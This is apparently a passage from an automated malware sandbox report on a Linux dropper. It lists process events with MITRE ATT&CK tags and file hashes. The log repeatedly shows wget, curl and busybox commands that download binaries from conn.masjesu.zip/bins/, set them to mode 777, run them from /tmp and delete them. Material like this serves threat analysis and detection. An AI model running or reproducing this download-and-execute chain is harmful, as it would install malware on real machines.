/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- System Network Configuration Discovery
PID:938
-
-
/bin/chmodchmod 777 EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- File and Directory Permissions Modification
PID:939
-
-
/tmp/EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv./EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵
- Executes dropped EXE
PID:940
-
-
/bin/rmrm EZ58vp91f1ZxctlzcOdhMU2B4X6A85Hslv2⤵PID:941
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:942
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:943
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- System Network Configuration Discovery
PID:945
-
-
/bin/chmodchmod 777 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- File and Directory Permissions Modification
PID:946
-
-
/tmp/0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB74./0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵
- Executes dropped EXE
PID:947
-
-
/bin/rmrm 0uEU7ZyWZSxUL9OqzLPhkCGsEhEQW7qB742⤵PID:948
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵PID:949
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:950
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵PID:952
-
-
/bin/chmodchmod 777 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- File and Directory Permissions Modification
PID:953
-
-
/tmp/2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y./2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵
- Executes dropped EXE
PID:954
-
-
/bin/rmrm 2PhZQ4FmiWiAI527icss1J88hOzCWIR92Y2⤵PID:955
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵PID:956
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:957
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵PID:959
-
-
/bin/chmodchmod 777 PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- File and Directory Permissions Modification
PID:960
-
-
/tmp/PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr./PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵
- Executes dropped EXE
PID:961
-
-
/bin/rmrm PB4ZOVQ1M7wwG58lSyoc59M13IwrdnjMQr2⤵PID:962
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:963
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:964
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- System Network Configuration Discovery
PID:966
-
-
/bin/chmodchmod 777 ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- File and Directory Permissions Modification
PID:967
-
-
/tmp/ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g./ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵
- Executes dropped EXE
PID:968
-
-
/bin/rmrm ETDKlCBz4cBM5l0FupJVVh3slmjvFhZJ7g2⤵PID:969
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:970
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:971
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- System Network Configuration Discovery
PID:973
-
-
/bin/chmodchmod 777 Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- File and Directory Permissions Modification
PID:974
-
-
/tmp/Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR./Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵
- Executes dropped EXE
PID:975
-
-
/bin/rmrm Ru6sKX81l2lQt7XDsPKYP4FnQKN2pKXImR2⤵PID:976
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- System Network Configuration Discovery
PID:977
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:978
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- System Network Configuration Discovery
PID:980
-
-
/bin/chmodchmod 777 JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- File and Directory Permissions Modification
PID:981
-
-
/tmp/JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR./JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵
- Executes dropped EXE
PID:982
-
-
/bin/rmrm JF6z14qvFTJKmcwYSnYZh5ySFX9q4ftSfR2⤵PID:983
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- System Network Configuration Discovery
PID:984
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:985
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- System Network Configuration Discovery
PID:987
-
-
/bin/chmodchmod 777 V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- File and Directory Permissions Modification
PID:988
-
-
/tmp/V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf./V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵
- Executes dropped EXE
PID:989
-
-
/bin/rmrm V4WuUD8F16Gomarpl99gUrKPBAwCxEinVf2⤵PID:990
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- System Network Configuration Discovery
PID:991
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:992
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- System Network Configuration Discovery
PID:994
-
-
/bin/chmodchmod 777 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- File and Directory Permissions Modification
PID:995
-
-
/tmp/4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n./4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵
- Executes dropped EXE
PID:996
-
-
/bin/rmrm 4NUqyP0t2Bra0RpFtBE0OI9ButiIILml7n2⤵PID:997
-
-
/usr/bin/wgetwget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵PID:998
-
-
/usr/bin/curlcurl -O http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Reads runtime system information
- System Network Configuration Discovery
- Writes file to tmp directory
PID:999
-
-
/bin/busybox/bin/busybox wget http://conn.masjesu.zip/bins/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- System Network Configuration Discovery
PID:1001
-
-
/bin/chmodchmod 777 r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- File and Directory Permissions Modification
PID:1002
-
-
/tmp/r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ./r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵
- Executes dropped EXE
PID:1003
-
-
/bin/rmrm r1VEdjkHejuMJk5bGG2ytM2ZEzDqtyEMAJ2⤵PID:1004
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
153B
MD5998368d7c95ea4293237f2320546e440
SHA130dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97